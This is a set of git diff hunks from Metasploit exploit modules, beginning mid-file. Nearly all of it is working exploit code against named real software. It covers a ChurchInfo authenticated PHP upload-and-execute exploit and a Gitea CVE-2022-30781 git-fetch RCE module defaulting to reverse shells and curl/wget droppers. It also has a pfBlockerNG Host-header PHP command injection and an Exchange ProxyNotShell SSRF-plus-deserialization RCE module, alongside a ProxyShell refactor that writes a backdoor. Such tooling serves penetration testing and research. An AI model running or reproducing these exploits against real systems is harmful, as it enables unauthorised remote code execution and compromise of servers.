+      'uri' => normalize_uri(target_uri.path, 'AutoUpdate', 'Update1_2_12To1_2_13.php'),
+      'method' => 'GET'
+    )
+
+    if res && (res.code == 500 || res.code == 200)
+      return CheckCode::Vulnerable('Target is running ChurchInfo 1.2.13!')
+    else
+      return CheckCode::Safe('Target is not running a vulnerable version of ChurchInfo!')
+    end
+  end
+
+  #
+  # The exploit method attempts a login, adds items to the cart, then creates the email attachment.
+  # Adding items to the cart is required for the server-side code to accept the upload.
+  #
+  def exploit
+    # Need to grab the PHP session cookie value first to pass to application
+    vprint_status('Gathering PHP session cookie')
+    if datastore['SSL'] == true
+      vprint_status('SSL is true, changing protocol to HTTPS')
+      proto_var = 'https'
+    else
+      vprint_status('SSL is false, leaving protocol as HTTP')
+      proto_var = 'http'
+    end
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'Default.php'),
+      'method' => 'GET',
+      'vars_get' => {
+        'Proto' => proto_var,
+        'Path' => datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + datastore['TARGETURI']
+      },
+      'keep_cookies' => true
+    )
+
+    # Ensure we get a 200 from the application login page
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to reach the ChurchInfo login page (response code: #{res.code})")
+    end
+
+    # Check that we actually are targeting a ChurchInfo server.
+    unless res.body.match(%r{<title>ChurchInfo: Login</title>})
+      fail_with(Failure::NotVulnerable, 'Target is not a ChurchInfo!')
+    end
+
+    # Grab our assigned session cookie
+    cookie = res.get_cookies
+    vprint_good("PHP session cookie is #{cookie}")
+    vprint_status('Attempting login')
+
+    # Attempt a login with the cookie assigned, server will assign privs on server-side if authenticated
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'Default.php'),
+      'method' => 'POST',
+      'vars_post' => {
+        'User' => datastore['USERNAME'],
+        'Password' => datastore['PASSWORD'],
+        'sURLPath' => datastore['TARGETURI']
+      }
+    )
+
+    # A valid login will give us a 302 redirect to TARGETURI + /CheckVersion.php so check that.
+    unless res && res.code == 302 && res.headers['Location'] == datastore['TARGETURI'] + '/CheckVersion.php'
+      fail_with(Failure::UnexpectedReply, "#{peer} - Check if credentials are correct (response code: #{res.code})")
+    end
+    vprint_good("Location header is #{res.headers['Location']}")
+    print_good("Logged into application as #{datastore['USERNAME']}")
+    vprint_status('Attempting exploit')
+
+    # We must add items to the cart before we can send the emails. This is a hard requirement server-side.
+    print_status('Navigating to add items to cart')
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'SelectList.php'),
+      'method' => 'GET',
+      'vars_get' => {
+        'mode' => 'person',
+        'AddAllToCart' => 'Add+to+Cart'
+      }
+    )
+
+    # Need to check that items were successfully added to the cart
+    # Here we're looking through html for the version string, similar to:
+    # Items in Cart: 2
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to add items to cart via HTTP GET request to SelectList.php (response code: #{res.code})")
+    end
+    cart_items = res.body.match(/Items in Cart: (?<cart>\d)/)
+    unless cart_items
+      fail_with(Failure::UnexpectedReply, "#{peer} - Server did not respond with the text 'Items in Cart'. Is this a ChurchInfo server?")
+    end
+    if cart_items['cart'].to_i < 1
+      print_error('No items in cart detected')
+      fail_with(Failure::UnexpectedReply,
+                'Failure to add items to cart, no items were detected. Check if there are person entries in the application')
+    end
+    print_good("Items in Cart: #{cart_items}")
+
+    # Uploading exploit as temporary email attachment
+    print_good('Uploading exploit via temp email attachment')
+    payload_name = Rex::Text.rand_text_alphanumeric(5..14) + '.php'
+    vprint_status("Payload name is #{payload_name}")
+
+    # Create the POST payload with required parameters to be parsed by the server
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(payload.encoded, 'application/octet-stream', nil,
+                       "form-data; name=\"Attach\"; filename=\"#{payload_name}\"")
+    post_data.add_part(datastore['EMAIL_SUBJ'], '', nil, 'form-data; name="emailsubject"')
+    post_data.add_part(datastore['EMAIL_MESG'], '', nil, 'form-data; name="emailmessage"')
+    post_data.add_part('Save Email', '', nil, 'form-data; name="submit"')
+    file = post_data.to_s
+    file.strip!
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'CartView.php'),
+      'method' => 'POST',
+      'data' => file,
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
+    )
+
+    # Ensure that we get a 200 and the intended payload was
+    # successfully uploaded and attached to the draft email.
+    unless res.code == 200 && res.body.include?("Attach file:</b> #{payload_name}")
+      fail_with(Failure::Unknown, 'Failed to upload the payload.')
+    end
+    print_good("Exploit uploaded to #{target_uri.path + 'tmp_attach/' + payload_name}")
+
+    # Have our payload deleted after we exploit
+    register_file_for_cleanup(payload_name)
+
+    # Make a GET request to the PHP file that was uploaded to execute it on the target server.
+    print_good('Executing payload with GET request')
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'tmp_attach', payload_name),
+      'method' => 'GET'
+    )
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+  end
+end
@@ -0,0 +1,248 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::Remote::HTTP::Gitea
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Gitea Git Fetch Remote Code Execution',
+        'Description' => %q{
+          This module exploits Git fetch command in Gitea repository migration
+          process that leads to a remote command execution on the system.
+          This vulnerability affect Gitea before 1.16.7 version.
+        },
+        'Author' => [
+          'wuhan005', # Original PoC
+          'li4n0', # Original PoC
+          'krastanoel' # MSF Module
+        ],
+        'References' => [
+          ['CVE', '2022-30781'],
+          ['URL', 'https://tttang.com/archive/1607/']
+        ],
+        'DisclosureDate' => '2022-05-16',
+        'License' => MSF_LICENSE,
+        'Platform' => %w[unix linux win],
+        'Arch' => ARCH_CMD,
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => %i[curl wget echo printf],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :win_dropper,
+              'CmdStagerFlavor' => [ 'psh_invokewebrequest' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
+                'CMDSTAGER::URIPATH' => '/payloads'
+              }
+            }
+          ]
+        ],
+        'DefaultOptions' => { 'WfsDelay' => 30 },
+        'DefaultTarget' => 1,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(3000),
+      OptString.new('USERNAME', [true, 'Username to authenticate with']),
+      OptString.new('PASSWORD', [true, 'Password to use']),
+      OptString.new('URIPATH', [false, 'The URI to use for this exploit', '/']),
+    ])
+  end
+
+  def cleanup
+    super
+    return if @uid.nil? || @migrate_repo_created.nil?
+
+    [@repo_name, @migrate_repo_name].each do |name|
+      res = gitea_remove_repo(repo_path(name))
+      if res.nil? || res&.code == 200
+        vprint_warning("Unable to remove repository '#{name}'")
+      elsif res&.code == 404
+        vprint_warning("Repository '#{name}' not found, possibly already deleted")
+      else
+        vprint_status("Successfully cleanup repository '#{name}'")
+      end
+    end
+  end
+
+  def check
+    return CheckCode::Safe('USERNAME can\'t be blank') if datastore['username'].blank?
+
+    v = get_gitea_version
+    gitea_login(datastore['username'], datastore['password'])
+
+    if Rex::Version.new(v) <= Rex::Version.new('1.16.6')
+      return CheckCode::Appears("Version detected: #{v}")
+    end
+
+    CheckCode::Safe("Version detected: #{v}")
+  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::UnknownError => e
+    return CheckCode::Unknown(e.message)
+  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::VersionError => e
+    return CheckCode::Detected(e.message)
+  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError,
+         Msf::Exploit::Remote::HTTP::Gitea::Error::AuthenticationError => e
+    return CheckCode::Safe(e.message)
+  end
+
+  def primer
+    [
+      '/api/v1/version', '/api/v1/settings/api',
+      "/api/v1/repos/#{@migrate_repo_path}",
+      "/api/v1/repos/#{@migrate_repo_path}/pulls",
+      "/api/v1/repos/#{@migrate_repo_path}/topics"
+    ].each { |uri| hardcoded_uripath(uri) } # adding resources
+  end
+
+  def execute_command(cmd, _opts = {})
+    if target['Type'] == :win_dropper
+      # Git on Windows will pass the command to `sh.exe` and not `cmd`.
+      # This requires some adjustments:
+      # - Windows environment variables are mapped by `sh.exe`: `%VAR%` becomes `$VAR`
+      # - `cmd` uses `&` to join multiple commands, whereas `sh.exe` uses `&&`.
+      # - Backslashes need to be escaped with `sh.exe`
+      cmd = cmd.gsub(/%(\w+)%/) { "$#{::Regexp.last_match(1)}" }.gsub(/&/) { '&&' }.gsub(/\\/) { '\\\\\\' }
+    end
+    vprint_status("Executing command: #{cmd}")
+
+    @repo_name = rand_text_alphanumeric(6..15)
+    @migrate_repo_name = rand_text_alphanumeric(6..15)
+    @migrate_repo_path = repo_path(@migrate_repo_name)
+
+    vprint_status("Creating repository \"#{@repo_name}\"")
+    @uid = gitea_create_repo(@repo_name)
+    vprint_good('Repository created')
+    vprint_status('Migrating repository')
+    clone_url = "http://#{srvhost_addr}:#{srvport}/#{@migrate_repo_path}"
+    auth_token = rand_text_alphanumeric(6..15)
+    @migrate_repo_created = gitea_migrate_repo(@migrate_repo_name, @uid, clone_url, auth_token)
+    @p = cmd
+  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::MigrationError,
+         Msf::Exploit::Remote::HTTP::Gitea::Error::RepositoryError,
+         Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError => e
+    fail_with(Failure::UnexpectedReply, e.message)
+  end
+
+  def exploit
+    unless datastore['AutoCheck']
+      fail_with(Failure::BadConfig, 'USERNAME can\'t be blank') if datastore['username'].blank?
+      gitea_login(datastore['username'], datastore['password'])
+    end
+
+    start_service
+    primer
+
+    case target['Type']
+    when :unix_cmd, :win_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper, :win_dropper
+      datastore['CMDSTAGER::URIPATH'] = "/#{rand_text_alphanumeric(6..15)}"
+      execute_cmdstager(background: true, delay: 1)
+    end
+  rescue Timeout::Error => e
+    fail_with(Failure::TimeoutExpired, e.message)
+  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError => e
+    fail_with(Failure::UnexpectedReply, e.message)
+  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::AuthenticationError => e
+    fail_with(Failure::NoAccess, e.message)
+  end
+
+  def repo_path(name)
+    "#{datastore['username']}/#{name}"
+  end
+
+  def on_request_uri(cli, req)
+    case req.uri
+    when '/api/v1/version'
+      send_response(cli, '{"version": "1.16.6"}')
+    when '/api/v1/settings/api'
+      data = {
+        max_response_items: 50, default_paging_num: 30,
+        default_git_trees_per_page: 1000, default_max_blob_size: 10485760
+      }
+      send_response(cli, data.to_json)
+    when "/api/v1/repos/#{@migrate_repo_path}"
+      data = {
+        clone_url: "#{full_uri}#{datastore['username']}/#{@repo_name}",
+        owner: { login: datastore['username'] }
+      }
+      send_response(cli, data.to_json)
+    when "/api/v1/repos/#{@migrate_repo_path}/topics?limit=0&page=1"
+      send_response(cli, '{"topics":[]}')
+    when "/api/v1/repos/#{@migrate_repo_path}/pulls?limit=50&page=1&state=all"
+      data = [
+        {
+          base: {
+            ref: 'master'
+          },
+          head: {
+            ref: "--upload-pack=#{@p}",
+            repo: {
+              clone_url: './',
+              owner: { login: 'master' }
+            }
+          },
+          updated_at: '2001-01-01T05:00:00+01:00',
+          user: {}
+        }
+      ]
+      send_response(cli, data.to_json)
+    when datastore['CMDSTAGER::URIPATH']
+      super
+    end
+  end
+end
@@ -62,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote

    register_options([
      OptString.new("BODY", [false, 'The message for the document body', '']),
-      OptString.new('FILENAME', [true, 'The OpoenOffice Text document name', 'msf.odt'])
+      OptString.new('FILENAME', [true, 'The OpenOffice Text document name', 'msf.odt'])
    ])
  end

@@ -106,16 +106,37 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def check
-    upload_shell
-    check_resp = send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, "/#{@webshell_name}"),
-      'vars_post' => {
-        @parameter_name.to_s => 'id'
+    test_file_name = Rex::Text.rand_text_alpha(4..12)
+    test_file_content = Rex::Text.rand_text_alpha(4..12)
+    test_injection = <<~EOF
+      <?php echo file_put_contents('/usr/local/www/#{test_file_name}','#{test_file_content}');
+    EOF
+    encoded_php = test_injection.unpack('H*')[0].upcase
+    send_request_raw(
+      'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),
+      'headers' => {
+        'Host' => "' *; echo '16i #{encoded_php} P' | dc | php; '"
      }
    )
-    return Exploit::CheckCode::Safe('Error uploading shell, the system is likely patched.') if check_resp.nil? || check_resp.body.nil? || !check_resp.body.include?('uid=0(root) gid=0(wheel)')
+    sleep datastore['WfsDelay']

+    check_resp = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "/#{test_file_name}")
+    )
+    return Exploit::CheckCode::Safe('Error uploading shell, the system is likely patched.') if check_resp.nil? || !check_resp.code == 200 || !check_resp.body.include?(test_file_content)
+
+    # Clean up test webshell "/usr/local/www/#{test_file_name}"
+    clean_up_injection = <<~EOF
+      <?php echo unlink('/usr/local/www/#{test_file_name}');
+    EOF
+    encoded_clean_up = clean_up_injection.unpack('H*')[0].upcase
+    send_request_raw(
+      'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),
+      'headers' => {
+        'Host' => "' *; echo '16i #{encoded_clean_up} P' | dc | php; '"
+      }
+    )
    Exploit::CheckCode::Vulnerable
  end

@@ -133,7 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def exploit
-    upload_shell unless datastore['AutoCheck']
+    upload_shell
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    case target['Type']
    when :unix_cmd
@@ -0,0 +1,236 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Remote::HTTP::Exchange
+  include Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Microsoft Exchange ProxyNotShell RCE',
+        'Description' => %q{
+          This module chains two vulnerabilities on Microsoft Exchange Server
+          that, when combined, allow an authenticated attacker to interact with
+          the Exchange Powershell backend (CVE-2022-41040), where a
+          deserialization flaw can be leveraged to obtain code execution
+          (CVE-2022-41082). This exploit only support Exchange Server 2019.
+
+          These vulnerabilities were patched in November 2022.
+        },
+        'Author' => [
+          'Orange Tsai', # Discovery of ProxyShell SSRF
+          'Spencer McIntyre', # Metasploit module
+          'DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q', # Vulnerability analysis
+          'Piotr Bazydło', # Vulnerability analysis
+          'Rich Warren', # EEMS bypass via ProxyNotRelay
+          'Soroush Dalili' # EEMS bypass
+        ],
+        'References' => [
+          [ 'CVE', '2022-41040' ], # ssrf
+          [ 'CVE', '2022-41082' ], # rce
+          [ 'URL', 'https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend' ],
+          [ 'URL', 'https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/' ],
+          [ 'URL', 'https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9' ],
+          [ 'URL', 'https://rw.md/2022/11/09/ProxyNotRelay.html' ]
+        ],
+        'DisclosureDate' => '2022-09-28', # announcement of limited details, patched 2022-11-08
+        'License' => MSF_LICENSE,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Platform' => ['windows'],
+        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Windows Dropper',
+            {
+              'Platform' => 'windows',
+              'Arch' => [ARCH_X64, ARCH_X86],
+              'Type' => :windows_dropper
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'windows',
+              'Arch' => [ARCH_CMD],
+              'Type' => :windows_command
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'AKA' => ['ProxyNotShell'],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('USERNAME', [ true, 'A specific username to authenticate as' ]),
+      OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]),
+      OptString.new('DOMAIN', [ false, 'The domain to authenticate to' ])
+    ])
+
+    register_advanced_options([
+      OptEnum.new('EemsBypass', [ true, 'Technique to bypass the EEMS rule', 'IBM037v1', %w[IBM037v1 none]])
+    ])
+  end
+
+  def check
+    @ssrf_email ||= Faker::Internet.email
+    res = send_http('GET', '/mapi/nspi/')
+    return CheckCode::Unknown if res.nil?
+    return CheckCode::Unknown('Server responded with 401 Unauthorized.') if res.code == 401
+    return CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint'
+
+    # actually run the powershell cmdlet and see if it works, this will fail if:
+    #   * the credentials are incorrect (USERNAME, PASSWORD, DOMAIN)
+    #   * the exchange emergency mitigation service M1 rule is in place
+    return CheckCode::Safe unless execute_powershell('Get-Mailbox')
+
+    CheckCode::Vulnerable
+  rescue Msf::Exploit::Failed => e
+    CheckCode::Safe(e.to_s)
+  end
+
+  def ibm037(string)
+    string.encode('IBM037').force_encoding('ASCII-8BIT')
+  end
+
+  def send_http(method, uri, opts = {})
+    opts[:authentication] = {
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD'],
+      'preferred_auth' => 'NTLM'
+    }
+
+    if uri =~ /powershell/i && datastore['EemsBypass'] == 'IBM037v1'
+      uri = "/Autodiscover/autodiscover.json?#{ibm037(@ssrf_email + uri + '?')}&#{ibm037('Email')}=#{ibm037('Autodiscover/autodiscover.json?' + @ssrf_email)}"
+      opts[:headers] = {
+        'X-Up-Devcap-Post-Charset' => 'IBM037',
+        # technique needs the "UP" prefix, see: https://github.com/Microsoft/referencesource/blob/3b1eaf5203992df69de44c783a3eda37d3d4cd10/System/net/System/Net/HttpListenerRequest.cs#L362
+        'User-Agent' => "UP #{datastore['UserAgent']}"
+      }
+    else
+      uri = "/Autodiscover/autodiscover.json?#{@ssrf_email + uri}?&Email=Autodiscover/autodiscover.json?#{@ssrf_email}"
+    end
+
+    super(method, uri, opts)
+  end
+
+  def exploit
+    # if we're doing pre-exploit checks, make sure the target is Exchange Server 2019 because the XamlGadget does not
+    # work on Exchange Server 2016
+    if datastore['AutoCheck'] && !datastore['ForceExploit'] && (version = exchange_get_version)
+      vprint_status("Detected Exchange version: #{version}")
+      if version < Rex::Version.new('15.2')
+        fail_with(Failure::NoTarget, 'This exploit is only compatible with Exchange Server 2019 (version 15.2)')
+      end
+    end
+
+    @ssrf_email ||= Faker::Internet.email
+
+    case target['Type']
+    when :windows_command
+      vprint_status("Generated payload: #{payload.encoded}")
+      execute_command(payload.encoded)
+    when :windows_dropper
+      execute_cmdstager({ linemax: 7_500 })
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    xaml = Nokogiri::XML(<<-XAML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root
+      <ResourceDictionary
+        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
+        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
+        xmlns:System="clr-namespace:System;assembly=mscorlib"
+        xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system">
+        <ObjectDataProvider x:Key="LaunchCalch" ObjectType="{x:Type Diag:Process}" MethodName="Start">
+          <ObjectDataProvider.MethodParameters>
+            <System:String>cmd.exe</System:String>
+            <System:String>/c #{cmd.encode(xml: :text)}</System:String>
+          </ObjectDataProvider.MethodParameters>
+        </ObjectDataProvider>
+      </ResourceDictionary>
+    XAML
+
+    identity = Nokogiri::XML(<<-IDENTITY, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root
+      <Obj N="V" RefId="14">
+        <TN RefId="1">
+        <T>System.ServiceProcess.ServiceController</T>
+          <T>System.Object</T>
+        </TN>
+        <ToString>Object</ToString>
+        <Props>
+          <S N="Name">Type</S>
+          <Obj N="TargetTypeForDeserialization">
+            <TN RefId="1">
+              <T>System.Exception</T>
+              <T>System.Object</T>
+            </TN>
+            <MS>
+              <BA N="SerializationData">
+                #{Rex::Text.encode_base64(XamlLoaderGadget.generate.to_binary_s)}
+              </BA>
+            </MS>
+          </Obj>
+        </Props>
+        <S>
+          <![CDATA[#{xaml}]]>
+        </S>
+      </Obj>
+    IDENTITY
+
+    execute_powershell('Get-Mailbox', args: [
+      { name: '-Identity', value: identity }
+    ])
+  end
+end
+
+class XamlLoaderGadget < Msf::Util::DotNetDeserialization::Types::SerializedStream
+  include Msf::Util::DotNetDeserialization
+
+  def self.generate
+    from_values([
+      Types::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1),
+      Types::RecordValues::SystemClassWithMembersAndTypes.from_member_values(
+        class_info: Types::General::ClassInfo.new(
+          obj_id: 1,
+          name: 'System.UnitySerializationHolder',
+          member_names: %w[Data UnityType AssemblyName]
+        ),
+        member_type_info: Types::General::MemberTypeInfo.new(
+          binary_type_enums: %i[String Primitive String],
+          additional_infos: [ 8 ]
+        ),
+        member_values: [
+          Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(
+            obj_id: 2,
+            string: 'System.Windows.Markup.XamlReader'
+          )),
+          4,
+          Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(
+            obj_id: 3,
+            string: 'PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35'
+          ))
+        ]
+      ),
+      Types::RecordValues::MessageEnd.new
+    ])
+  end
+end
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-require 'winrm'
-
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

@@ -12,7 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::CmdStager
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Powershell
-  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell
  include Msf::Exploit::EXE

  def initialize(info = {})
@@ -122,8 +120,7 @@ class MetasploitModule < Msf::Exploit::Remote
      OptString.new('ExchangeWritePath', [true, 'The path where you want to write the backdoor', 'owa\\auth']),
      OptString.new('IISBasePath', [true, 'The base path where IIS wwwroot directory is', 'C:\\inetpub\\wwwroot']),
      OptString.new('IISWritePath', [true, 'The path where you want to write the backdoor', 'aspnet_client']),
-      OptString.new('MapiClientApp', [true, 'This is MAPI client version sent in the request', 'Outlook/15.0.4815.1002']),
-      OptString.new('UserAgent', [true, 'The HTTP User-Agent sent in the request', Rex::UserAgent.session_agent])
+      OptString.new('MapiClientApp', [true, 'This is MAPI client version sent in the request', 'Outlook/15.0.4815.1002'])
    ])
  end

@@ -259,7 +256,7 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def probe_powershell_backend(common_access_token)
-    powershell_probe = send_http('GET', "/PowerShell/?X-Rps-CAT=#{common_access_token}&Email=Autodiscover/autodiscover.json?a=#{@ssrf_email}", cookie: :none)
+    powershell_probe = send_http('GET', "/PowerShell/?X-Rps-CAT=#{common_access_token}")
    fail_with(Failure::UnexpectedReply, 'Failed to access the PowerShell backend') unless powershell_probe&.code == 200
  end

@@ -274,7 +271,11 @@ class MetasploitModule < Msf::Exploit::Remote
      probe_powershell_backend(common_access_token)

      print_status("Assigning the 'Mailbox Import Export' role via #{email_address}")
-      unless execute_powershell(common_access_token, 'New-ManagementRoleAssignment', args: [ { name: '-Role', value: 'Mailbox Import Export' }, { name: '-User', value: email_address } ])
+      role_assigned = execute_powershell('New-ManagementRoleAssignment', cat: common_access_token, args: [
+        { name: '-Role', value: 'Mailbox Import Export' },
+        { name: '-User', value: email_address }
+      ])
+      unless role_assigned
        fail_with(Failure::BadConfig, 'The specified email address does not have the \'Mailbox Import Export\' role and can not self-assign it')
      end

@@ -297,7 +298,11 @@ class MetasploitModule < Msf::Exploit::Remote
      end

      common_access_token = build_token(this_sid)
-      next unless execute_powershell(common_access_token, 'New-ManagementRoleAssignment', args: [ { name: '-Role', value: 'Mailbox Import Export' }, { name: '-User', value: this_email_address } ])
+      role_assigned = execute_powershell('New-ManagementRoleAssignment', cat: common_access_token, args: [
+        { name: '-Role', value: 'Mailbox Import Export' },
+        { name: '-User', value: this_email_address }
+      ])
+      next unless role_assigned

      @mailbox_user_sid = this_sid
      @mailbox_user_email = this_email_address
@@ -310,25 +315,8 @@ class MetasploitModule < Msf::Exploit::Remote

  def send_http(method, uri, opts = {})
    ssrf = "Autodiscover/autodiscover.json?a=#{@ssrf_email}"
-    unless opts[:cookie] == :none
-      opts[:cookie] = "Email=#{ssrf}"
-    end
-
-    request = {
-      'method' => method,
-      'uri' => "/#{ssrf}#{uri}",
-      'agent' => datastore['UserAgent'],
-      'ctype' => opts[:ctype],
-      'headers' => { 'Accept' => '*/*', 'Cache-Control' => 'no-cache', 'Connection' => 'keep-alive' }
-    }
-    request = request.merge({ 'data' => opts[:data] }) unless opts[:data].nil?
-    request = request.merge({ 'cookie' => opts[:cookie] }) unless opts[:cookie].nil?
-    request = request.merge({ 'headers' => opts[:headers] }) unless opts[:headers].nil?
-
-    received = send_request_cgi(request)
-    fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received
-
-    received
+    opts[:cookie] = "Email=#{ssrf}"
+    super(method, "/#{ssrf}#{uri}", opts)
  end

  def get_emails
@@ -388,50 +376,6 @@ class MetasploitModule < Msf::Exploit::Remote
    Rex::Text.encode_base64(token)
  end

-  def execute_powershell(common_access_token, cmdlet, args: [])
-    winrm = SSRFWinRMConnection.new({
-      endpoint: full_uri('PowerShell/'),
-      transport: :ssrf,
-      ssrf_proc: proc do |method, uri, opts|
-        uri = "#{uri}?X-Rps-CAT=#{common_access_token}"
-        uri << "&Email=Autodiscover/autodiscover.json?a=#{@ssrf_email}"
-        opts[:cookie] = :none
-        opts[:data].gsub!(
-          %r{<#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>(.*?)</#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>},
-          "<#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>http://127.0.0.1/PowerShell/</#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>"
-        )
-        opts[:data].gsub!(
-          %r{<#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI mustUnderstand="true">(.*?)</#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>},
-          "<#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>"
-        )
-        send_http(method, uri, opts)
-      end
-    })
-
-    successful = true
-    begin
-      winrm.shell(:powershell) do |shell|
-        shell.instance_variable_set(:@max_fragment_blob_size, WinRM::PSRP::MessageFragmenter::DEFAULT_BLOB_LENGTH)
-        shell.extend(SSRFWinRMConnection::PowerShell)
-        shell.run({ cmdlet: cmdlet, args: args }) do |_stdout, stderr|
-          unless stderr.blank?
-            successful = false
-            vprint_error('PSRP error received:')
-            vprint_line(stderr)
-          end
-        end
-      end
-    rescue WinRM::WinRMError => e
-      vprint_error("Exception: #{e.message}")
-      successful = false
-    rescue RuntimeError => e
-      print_error("Exception: #{e.inspect}")
-      successful = false
-    end
-
-    successful
-  end
-
  def exploit
    @ssrf_email ||= Faker::Internet.email
    print_status('Attempt to exploit for CVE-2021-34473')
@@ -447,12 +391,12 @@ class MetasploitModule < Msf::Exploit::Remote
      unc_path = "\\\\\\\\#{@backend_server_name}\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{unc_path}\\#{@shell_filename}"
    end

